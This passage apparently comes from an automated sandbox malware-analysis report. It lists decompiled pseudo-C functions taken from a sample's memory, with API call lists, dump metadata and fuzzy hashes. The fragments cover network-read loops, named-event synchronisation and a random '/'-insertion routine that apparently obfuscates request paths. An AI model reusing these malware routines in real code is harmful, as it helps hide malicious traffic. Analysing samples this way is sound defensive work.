                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                  • String ID:
                  • API String ID: 943265810-0
                  • Opcode ID: 8ffe8f2d9389ef4bbcd0707c012189d8d2ffbedbf34d3095dd13658d6155a2ba
                  • Instruction ID: 251adebf3c0063145dbc7ef16cc1f2cb45cdca490ad206272f8d16d184484cb1
                  • Opcode Fuzzy Hash: 8ffe8f2d9389ef4bbcd0707c012189d8d2ffbedbf34d3095dd13658d6155a2ba
                  • Instruction Fuzzy Hash: B9416371900604BFDB31AFA5CD88EAB7BFDEF45700B144A69F542E20A0E7F19944DB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00BB5574(void* __eax, void* __ecx) {
                  				char _v8;
                  				void* _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				void* __esi;
                  				intOrPtr _t36;
                  				intOrPtr* _t37;
                  				intOrPtr* _t39;
                  				void* _t53;
                  				long _t58;
                  				void* _t59;
                  
                  				_t53 = __ecx;
                  				_t59 = __eax;
                  				_t58 = 0;
                  				ResetEvent( *(__eax + 0x1c));
                  				_push( &_v8);
                  				_push(4);
                  				_push( &_v20);
                  				_push( *((intOrPtr*)(_t59 + 0x18)));
                  				if( *0xbbd138() != 0) {
                  					L5:
                  					if(_v8 == 0) {
                  						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                  						L21:
                  						return _t58;
                  					}
                  					 *0xbbd168(0, 1,  &_v12);
                  					if(0 != 0) {
                  						_t58 = 8;
                  						goto L21;
                  					}
                  					_t36 = E00BB98E4(0x1000);
                  					_v16 = _t36;
                  					if(_t36 == 0) {
                  						_t58 = 8;
                  						L18:
                  						_t37 = _v12;
                  						 *((intOrPtr*)( *_t37 + 8))(_t37);
                  						goto L21;
                  					}
                  					_push(0);
                  					_push(_v8);
                  					_push( &_v20);
                  					while(1) {
                  						_t39 = _v12;
                  						_t56 =  *_t39;
                  						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                  						ResetEvent( *(_t59 + 0x1c));
                  						_push( &_v8);
                  						_push(0x1000);
                  						_push(_v16);
                  						_push( *((intOrPtr*)(_t59 + 0x18)));
                  						if( *0xbbd138() != 0) {
                  							goto L13;
                  						}
                  						_t58 = GetLastError();
                  						if(_t58 != 0x3e5) {
                  							L15:
                  							E00BB5DE8(_v16);
                  							if(_t58 == 0) {
                  								_t58 = E00BB214C(_v12, _t59);
                  							}
                  							goto L18;
                  						}
                  						_t58 = E00BB1BC5( *(_t59 + 0x1c), _t56, 0xffffffff);
                  						if(_t58 != 0) {
                  							goto L15;
                  						}
                  						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                  						if(_t58 != 0) {
                  							goto L15;
                  						}
                  						L13:
                  						_t58 = 0;
                  						if(_v8 == 0) {
                  							goto L15;
                  						}
                  						_push(0);
                  						_push(_v8);
                  						_push(_v16);
                  					}
                  				}
                  				_t58 = GetLastError();
                  				if(_t58 != 0x3e5) {
                  					L4:
                  					if(_t58 != 0) {
                  						goto L21;
                  					}
                  					goto L5;
                  				}
                  				_t58 = E00BB1BC5( *(_t59 + 0x1c), _t53, 0xffffffff);
                  				if(_t58 != 0) {
                  					goto L21;
                  				}
                  				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                  				goto L4;
                  			}

                  APIs
                  • ResetEvent.KERNEL32(?), ref: 00BB558A
                  • GetLastError.KERNEL32 ref: 00BB55A3
                    • Part of subcall function 00BB1BC5: WaitForMultipleObjects.KERNEL32(00000002,00BBAA33,00000000,00BBAA33,?,?,?,00BBAA33,0000EA60), ref: 00BB1BE0
                  • ResetEvent.KERNEL32(?), ref: 00BB561C
                  • GetLastError.KERNEL32 ref: 00BB5637
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                  • String ID:
                  • API String ID: 2394032930-0
                  • Opcode ID: 5b4ec9b353c97851a8f0e01bfcdd14a949b429d98eff09e3348f1bdce62076f5
                  • Instruction ID: 407f64391c0396647158cdeaa7bd0092a4d0bb76b4690734c5b02bb2a76a0cf7
                  • Opcode Fuzzy Hash: 5b4ec9b353c97851a8f0e01bfcdd14a949b429d98eff09e3348f1bdce62076f5
                  • Instruction Fuzzy Hash: 58318632600A04ABDB319BA4CC44FFE77F5EF88360F6506A5E516D7190EAF0DD419B11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1283FB
                  • __isleadbyte_l.LIBCMT ref: 6E128429
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E128457
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E12848D
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: cff1babed407d744bd919cec95c08b616448c6afe7b5ac2bd792ebe622bb6397
                  • Instruction ID: eee057fe9e5f19638c067f1808be23119f7c1ccb031f90b971be4775a8021d19
                  • Opcode Fuzzy Hash: cff1babed407d744bd919cec95c08b616448c6afe7b5ac2bd792ebe622bb6397
                  • Instruction Fuzzy Hash: 30316131A04296EFEB518EE5CC44BAA7BB9FF41314F218579E9648B190D730D8D1EB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E00BB9306(signed int _a4, signed int* _a8) {
                  				void* __ecx;
                  				void* __edi;
                  				signed int _t6;
                  				intOrPtr _t8;
                  				intOrPtr _t12;
                  				short* _t19;
                  				void* _t25;
                  				signed int* _t28;
                  				CHAR* _t30;
                  				long _t31;
                  				intOrPtr* _t32;
                  
                  				_t6 =  *0xbbd270; // 0xd448b889
                  				_t32 = _a4;
                  				_a4 = _t6 ^ 0x109a6410;
                  				_t8 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t3 = _t8 + 0xbbe862; // 0x61636f4c
                  				_t25 = 0;
                  				_t30 = E00BB7FCE(_t3, 1);
                  				if(_t30 != 0) {
                  					_t25 = CreateEventA(0xbbd2a8, 1, 0, _t30);
                  					E00BB5DE8(_t30);
                  				}
                  				_t12 =  *0xbbd25c; // 0x2000000a
                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00BB24C7() != 0) {
                  					L12:
                  					_t28 = _a8;
                  					if(_t28 != 0) {
                  						 *_t28 =  *_t28 | 0x00000001;
                  					}
                  					_t31 = E00BB5CB0(_t32, 0);
                  					if(_t31 == 0 && _t25 != 0) {
                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                  					}
                  					if(_t28 != 0 && _t31 != 0) {
                  						 *_t28 =  *_t28 & 0xfffffffe;
                  					}
                  					goto L20;
                  				} else {
                  					_t19 =  *0xbbd110( *_t32, 0x20);
                  					if(_t19 != 0) {
                  						 *_t19 = 0;
                  						_t19 = _t19 + 2;
                  					}
                  					_t31 = E00BB13E3(0,  *_t32, _t19, 0);
                  					if(_t31 == 0) {
                  						if(_t25 == 0) {
                  							L22:
                  							return _t31;
                  						}
                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                  						if(_t31 == 0) {
                  							L20:
                  							if(_t25 != 0) {
                  								CloseHandle(_t25);
                  							}
                  							goto L22;
                  						}
                  					}
                  					goto L12;
                  				}
                  			}















                  APIs
                    • Part of subcall function 00BB7FCE: lstrlen.KERNEL32(00BB197C,00000000,00000000,00000027,00000005,00000000,00000000,00BB8899,74666F53,00000000,00BB197C,00BBD00C,?,00BB197C), ref: 00BB8004
                    • Part of subcall function 00BB7FCE: lstrcpy.KERNEL32(00000000,00000000), ref: 00BB8028
                    • Part of subcall function 00BB7FCE: lstrcat.KERNEL32(00000000,00000000), ref: 00BB8030
                  • CreateEventA.KERNEL32(00BBD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00BBA849,?,00000001,?), ref: 00BB9347
                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00BBA849,00000000,00000000,?,00000000,?,00BBA849,?,00000001,?,?,?,?,00BB787A), ref: 00BB93A7
                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00BBA849,?,00000001,?), ref: 00BB93D5
                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00BBA849,?,00000001,?,?,?,?,00BB787A), ref: 00BB93ED
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                  • String ID:
                  • API String ID: 73268831-0
                  • Opcode ID: bd125c1a39ff6bfcd6e615cbb4819bcb18ec6cb69518a87ecd66459d92518bdf
                  • Instruction ID: 066ec98e95794a71e612ab578d993fbeb7fbf96b197e5b9ffc77327bf940cf64
                  • Opcode Fuzzy Hash: bd125c1a39ff6bfcd6e615cbb4819bcb18ec6cb69518a87ecd66459d92518bdf
                  • Instruction Fuzzy Hash: 5921F6325017119BC7316B689C85AFF77E9EF88B10B4507A5FB55E7290DBE4CC018758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 38%
                  			E00BB9208(void* __ecx, void* __esi) {
                  				char _v8;
                  				long _v12;
                  				char _v16;
                  				long _v20;
                  				long _t34;
                  				long _t39;
                  				long _t42;
                  				long _t56;
                  				intOrPtr _t58;
                  				void* _t59;
                  				intOrPtr* _t60;
                  				void* _t61;
                  
                  				_t61 = __esi;
                  				_t59 = __ecx;
                  				_t60 =  *0xbbd140; // 0xbbad41
                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                  				do {
                  					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                  					_v20 = _t34;
                  					if(_t34 != 0) {
                  						L3:
                  						_push( &_v16);
                  						_push( &_v8);
                  						_push(_t61 + 0x2c);
                  						_push(0x20000013);
                  						_push( *((intOrPtr*)(_t61 + 0x18)));
                  						_v8 = 4;
                  						_v16 = 0;
                  						if( *_t60() == 0) {
                  							_t39 = GetLastError();
                  							_v12 = _t39;
                  							if(_v20 == 0 || _t39 != 0x2ef3) {
                  								L15:
                  								return _v12;
                  							} else {
                  								goto L11;
                  							}
                  						}
                  						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                  							goto L11;
                  						} else {
                  							_v16 = 0;
                  							_v8 = 0;
                  							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                  							_t58 = E00BB98E4(_v8 + 1);
                  							if(_t58 == 0) {
                  								_v12 = 8;
                  							} else {
                  								_push( &_v16);
                  								_push( &_v8);
                  								_push(_t58);
                  								_push(0x16);
                  								_push( *((intOrPtr*)(_t61 + 0x18)));
                  								if( *_t60() == 0) {
                  									E00BB5DE8(_t58);
                  									_v12 = GetLastError();
                  								} else {
                  									 *((char*)(_t58 + _v8)) = 0;
                  									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                  								}
                  							}
                  							goto L15;
                  						}
                  					}
                  					SetEvent( *(_t61 + 0x1c));
                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                  					_v12 = _t56;
                  					if(_t56 != 0) {
                  						goto L15;
                  					}
                  					goto L3;
                  					L11:
                  					_t42 = E00BB1BC5( *(_t61 + 0x1c), _t59, 0xea60);
                  					_v12 = _t42;
                  				} while (_t42 == 0);
                  				goto L15;
                  			}
















                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 00BB921F
                  • SetEvent.KERNEL32(?), ref: 00BB922F
                  • GetLastError.KERNEL32 ref: 00BB92B8
                    • Part of subcall function 00BB1BC5: WaitForMultipleObjects.KERNEL32(00000002,00BBAA33,00000000,00BBAA33,?,?,?,00BBAA33,0000EA60), ref: 00BB1BE0
                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  • GetLastError.KERNEL32(00000000), ref: 00BB92ED
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                  • String ID:
                  • API String ID: 602384898-0
                  • Opcode ID: 2028e52453af74c8d26491f1ae33b0ce92d6b393fd744cc84b6c42a6d4a0c080
                  • Instruction ID: aee6895c123483b9aff31824fd232b908e70377d7b575428047502479d7c30bd
                  • Opcode Fuzzy Hash: 2028e52453af74c8d26491f1ae33b0ce92d6b393fd744cc84b6c42a6d4a0c080
                  • Instruction Fuzzy Hash: 1531F0B5D00709FFDB20EFA5C8C49EEBBF8EB18304F1049A9E602A2151D6B09A459F50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 40%
                  			E00BBA79A(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                  				intOrPtr _v12;
                  				void* _v16;
                  				void* _v28;
                  				char _v32;
                  				void* __esi;
                  				void* _t29;
                  				void* _t38;
                  				signed int* _t39;
                  				void* _t40;
                  
                  				_t36 = __ecx;
                  				_v32 = 0;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_v12 = _a4;
                  				_t38 = E00BB7D9E(__ecx,  &_v32);
                  				if(_t38 != 0) {
                  					L12:
                  					_t39 = _a8;
                  					L13:
                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                  						_t16 =  &(_t39[1]); // 0x5
                  						_t23 = _t16;
                  						if( *_t16 != 0) {
                  							E00BB9882(_t23);
                  						}
                  					}
                  					return _t38;
                  				}
                  				if(E00BB4EC8(0x40,  &_v16) != 0) {
                  					_v16 = 0;
                  				}
                  				_t40 = CreateEventA(0xbbd2a8, 1, 0,  *0xbbd344);
                  				if(_t40 != 0) {
                  					SetEvent(_t40);
                  					Sleep(0xbb8);
                  					CloseHandle(_t40);
                  				}
                  				_push( &_v32);
                  				if(_a12 == 0) {
                  					_t29 = E00BB230E(_t36);
                  				} else {
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_t29 = E00BB94E5(_t36);
                  				}
                  				_t41 = _v16;
                  				_t38 = _t29;
                  				if(_v16 != 0) {
                  					E00BB9D8B(_t41);
                  				}
                  				if(_t38 != 0) {
                  					goto L12;
                  				} else {
                  					_t39 = _a8;
                  					_t38 = E00BB9306( &_v32, _t39);
                  					goto L13;
                  				}
                  			}













                  APIs
                  • CreateEventA.KERNEL32(00BBD2A8,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,00BB787A,?,00000001,?), ref: 00BBA7EB
                  • SetEvent.KERNEL32(00000000,?,?,?,00BB787A,?,00000001,?,00000002,?,?,00BB19AA,?), ref: 00BBA7F8
                  • Sleep.KERNEL32(00000BB8,?,?,?,00BB787A,?,00000001,?,00000002,?,?,00BB19AA,?), ref: 00BBA803
                  • CloseHandle.KERNEL32(00000000,?,?,?,00BB787A,?,00000001,?,00000002,?,?,00BB19AA,?), ref: 00BBA80A
                    • Part of subcall function 00BB230E: WaitForSingleObject.KERNEL32(00000000,?,?,?,00BBA82A,?,00BBA82A,?,?,?,?,?,00BBA82A,?), ref: 00BB23E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                  • String ID:
                  • API String ID: 2559942907-0
                  • Opcode ID: 3868dcdd591920e8c4d8e620c9263e579403682dd4bbe1be815ff94a1fbff5a1
                  • Instruction ID: fcd53d6de3d973e02bac3d9a1eb18752f5b836095554e05444082a78c1464bf9
                  • Opcode Fuzzy Hash: 3868dcdd591920e8c4d8e620c9263e579403682dd4bbe1be815ff94a1fbff5a1
                  • Instruction Fuzzy Hash: 65218072D00219AFDB20BFE98C858FEB7F9EB44350B0145A5FA11A7100EBF499468BA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E00BB1000(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                  				intOrPtr _v8;
                  				void* _v12;
                  				void* _v16;
                  				intOrPtr _t26;
                  				intOrPtr* _t28;
                  				intOrPtr _t31;
                  				intOrPtr* _t32;
                  				void* _t39;
                  				int _t46;
                  				intOrPtr* _t47;
                  				int _t48;
                  
                  				_t47 = __eax;
                  				_push( &_v12);
                  				_push(__eax);
                  				_t39 = 0;
                  				_t46 = 0;
                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                  				_v8 = _t26;
                  				if(_t26 < 0) {
                  					L13:
                  					return _v8;
                  				}
                  				if(_v12 == 0) {
                  					Sleep(0xc8);
                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                  				}
                  				if(_v8 >= _t39) {
                  					_t28 = _v12;
                  					if(_t28 != 0) {
                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                  						_v8 = _t31;
                  						if(_t31 >= 0) {
                  							_t46 = lstrlenW(_v16);
                  							if(_t46 != 0) {
                  								_t46 = _t46 + 1;
                  								_t48 = _t46 + _t46;
                  								_t39 = E00BB98E4(_t48);
                  								if(_t39 == 0) {
                  									_v8 = 0x8007000e;
                  								} else {
                  									memcpy(_t39, _v16, _t48);
                  								}
                  								__imp__#6(_v16);
                  							}
                  						}
                  						_t32 = _v12;
                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                  					}
                  					 *_a4 = _t39;
                  					 *_a8 = _t46 + _t46;
                  				}
                  				goto L13;
                  			}















                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeSleepStringlstrlenmemcpy
                  • String ID:
                  • API String ID: 1198164300-0
                  • Opcode ID: 05218bf03b8db3814fcc3d673f03ab5d1ee4f69cd600d2f9ed0419b455429754
                  • Instruction ID: 3d08ff50df63b46e52139ba5b112783d9aa955049f0c234f3e1e665ffb1bab6d
                  • Opcode Fuzzy Hash: 05218bf03b8db3814fcc3d673f03ab5d1ee4f69cd600d2f9ed0419b455429754
                  • Instruction Fuzzy Hash: C9215075900249EFCB11EFA8C9949EEBBF9FF49341B5045A9E905E7210EBB1DA40CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E00BB8D06(unsigned int __eax, void* __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				signed int _t21;
                  				signed short _t23;
                  				char* _t27;
                  				void* _t29;
                  				void* _t30;
                  				unsigned int _t33;
                  				void* _t37;
                  				unsigned int _t38;
                  				void* _t41;
                  				void* _t42;
                  				int _t45;
                  				void* _t46;
                  
                  				_t42 = __eax;
                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                  				_t38 = __eax;
                  				_t30 = RtlAllocateHeap( *0xbbd238, 0, (__eax >> 3) + __eax + 1);
                  				_v12 = _t30;
                  				if(_t30 != 0) {
                  					_v8 = _t42;
                  					do {
                  						_t33 = 0x18;
                  						if(_t38 <= _t33) {
                  							_t33 = _t38;
                  						}
                  						_t21 =  *0xbbd250; // 0xc4b2110
                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                  						 *0xbbd250 = _t23;
                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                  						memcpy(_t30, _v8, _t45);
                  						_v8 = _v8 + _t45;
                  						_t27 = _t30 + _t45;
                  						_t38 = _t38 - _t45;
                  						_t46 = _t46 + 0xc;
                  						 *_t27 = 0x2f;
                  						_t13 = _t27 + 1; // 0x1
                  						_t30 = _t13;
                  					} while (_t38 > 8);
                  					memcpy(_t30, _v8, _t38 + 1);
                  				}
                  				return _v12;
                  			}


















                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00BB624C,00000000,?,?,00BB6028,?,036195B0), ref: 00BB8D11
                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00BB8D29
                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00BB624C,00000000,?,?,00BB6028,?,036195B0), ref: 00BB8D6D
                  • memcpy.NTDLL(00000001,?,00000001), ref: 00BB8D8E
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: memcpy$AllocateHeaplstrlen
                  • String ID:
                  • API String ID: 1819133394-0
                  • Opcode ID: 8bcef06dca848c5c8248c625b78709060a4cefa36c6a8002325f9b24eacf1e33
                  • Instruction ID: becb77a7759725f27a1558ad819070aee35d8c88f8c3870f6b8b98813673c1c3
                  • Opcode Fuzzy Hash: 8bcef06dca848c5c8248c625b78709060a4cefa36c6a8002325f9b24eacf1e33
                  • Instruction Fuzzy Hash: B911C672A00154AFD714DB69DC84DAEBFEEDBD4360B0502BAF60497190EBB49E04C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                  • Instruction ID: efc60baeabaff140f2c2f86ee6539793c89da04fc8b4b1a2a4113c13af2a4bd4
                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                  • Instruction Fuzzy Hash: 1D01243244014EBB8F429EC4CC129EA3F66BB2D254B658815FA3858130DB36C9B1BB89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 6E10E28B
                    • Part of subcall function 6E10E980: ___BuildCatchObjectHelper.LIBCMT ref: 6E10E9B2
                    • Part of subcall function 6E10E980: ___AdjustPointer.LIBCMT ref: 6E10E9C9
                  • _UnwindNestedFrames.LIBCMT ref: 6E10E2A2
                  • ___FrameUnwindToState.LIBCMT ref: 6E10E2B4
                  • CallCatchBlock.LIBCMT ref: 6E10E2D8
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                  • String ID:
                  • API String ID: 2901542994-0
                  • Opcode ID: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
                  • Instruction ID: b62e7bbcfcf331b7da79ade0389380820f1547ad09d8249ecc25ed2c62799e5a
                  • Opcode Fuzzy Hash: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
                  • Instruction Fuzzy Hash: 04010C32100109FBDF029F96CC01EDA7FBAFF58758F158415F91865120DB72EAA1EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00BB7FCE(intOrPtr _a4, intOrPtr _a8) {
                  				char _v20;
                  				void* _t8;
                  				void* _t13;
                  				void* _t16;
                  				char* _t18;
                  				void* _t19;
                  
                  				_t19 = 0x27;
                  				_t1 =  &_v20; // 0x74666f53
                  				_t18 = 0;
                  				E00BB7D4B(_t8, _t1);
                  				_t16 = E00BB98E4(_t19);
                  				if(_t16 != 0) {
                  					_t3 =  &_v20; // 0x74666f53
                  					_t13 = E00BB1365(_t3, _t16, _a8);
                  					if(_a4 != 0) {
                  						__imp__(_a4);
                  						_t19 = _t13 + 0x27;
                  					}
                  					_t18 = E00BB98E4(_t19);
                  					if(_t18 != 0) {
                  						 *_t18 = 0;
                  						if(_a4 != 0) {
                  							__imp__(_t18, _a4);
                  						}
                  						__imp__(_t18, _t16);
                  					}
                  					E00BB5DE8(_t16);
                  				}
                  				return _t18;
                  			}










                  APIs
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                    • Part of subcall function 00BB1365: wsprintfA.USER32 ref: 00BB13C1
                  • lstrlen.KERNEL32(00BB197C,00000000,00000000,00000027,00000005,00000000,00000000,00BB8899,74666F53,00000000,00BB197C,00BBD00C,?,00BB197C), ref: 00BB8004
                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00BB8028
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BB8030
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                  • String ID: Soft
                  • API String ID: 393707159-3753413193
                  • Opcode ID: 6a442f3f39437f89ad56fb3ff045c3fcabfe903d2c4df7955518009d1f2af487
                  • Instruction ID: 252553592dde9ba64726e6eace8bdfaa145031032f85d2ed9442d3f94166b4f7
                  • Opcode Fuzzy Hash: 6a442f3f39437f89ad56fb3ff045c3fcabfe903d2c4df7955518009d1f2af487
                  • Instruction Fuzzy Hash: 8A018F32100509A7CB227BA89C88AFF3AECEF893C5F444165F6045A102DFF48945D7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB891E(void* __esi) {
                  				struct _SECURITY_ATTRIBUTES* _v4;
                  				void* _t8;
                  				void* _t10;
                  
                  				_v4 = 0;
                  				memset(__esi, 0, 0x38);
                  				_t8 = CreateEventA(0, 1, 0, 0);
                  				 *(__esi + 0x1c) = _t8;
                  				if(_t8 != 0) {
                  					_t10 = CreateEventA(0, 1, 1, 0);
                  					 *(__esi + 0x20) = _t10;
                  					if(_t10 == 0) {
                  						CloseHandle( *(__esi + 0x1c));
                  					} else {
                  						_v4 = 1;
                  					}
                  				}
                  				return _v4;
                  			}







                  APIs
                  • memset.NTDLL ref: 00BB892C
